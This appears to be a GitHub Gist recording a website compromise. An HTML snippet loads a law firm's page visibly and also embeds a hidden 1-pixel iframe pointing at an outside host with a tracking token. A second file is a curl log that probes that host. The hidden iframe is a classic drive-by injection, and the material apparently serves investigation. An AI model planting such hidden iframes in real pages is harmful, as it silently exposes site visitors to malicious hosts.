Last active
August 29, 2015 14:10
-
-
Save yteraoka/2a61e7ba3dd8d8a7c033 to your computer and use it in GitHub Desktop.
gihyo-20141206
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
</head> | |
<body> | |
<iframe src="http://www.koushin-lawfirm.jp/" style="width:100%; height:100%;"></iframe> | |
<iframe src="http://live.livelistingreport.com/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cYWIyYzgzZDgwNTI1MTFjYmQwMDk4ZjFlODM0ODA4ZjI" style="width:1px; height:1px; visibility:hidden;"></iframe> | |
</body> | |
</html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ curl -s -v 'http://live.livelistingreport.com/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cYWIyYzgzZDgwNTI1MTFjYmQwMDk4ZjFlODM0ODA4ZjI' | |
* Hostname was NOT found in DNS cache | |
* Trying 37.200.68.53... | |
* Connected to live.livelistingreport.com (37.200.68.53) port 80 (#0) | |
> GET /?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cYWIyYzgzZDgwNTI1MTFjYmQwMDk4ZjFlODM0ODA4ZjI HTTP/1.1 | |
> User-Agent: curl/7.35.0 | |
> Host: live.livelistingreport.com | |
> Accept: */* | |
> | |
< HTTP/1.1 200 OK | |
* Server nginx/1.2.1 is not blacklisted | |
< Server: nginx/1.2.1 | |
< Date: Sat, 06 Dec 2014 04:49:44 GMT | |
< Content-Type: text/html | |
< Content-Length: 0 | |
< Connection: keep-alive | |
< X-Powered-By: PHP/5.4.4-14+deb7u14 | |
< Vary: Accept-Encoding | |
< | |
* Connection #0 to host live.livelistingreport.com left intact |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment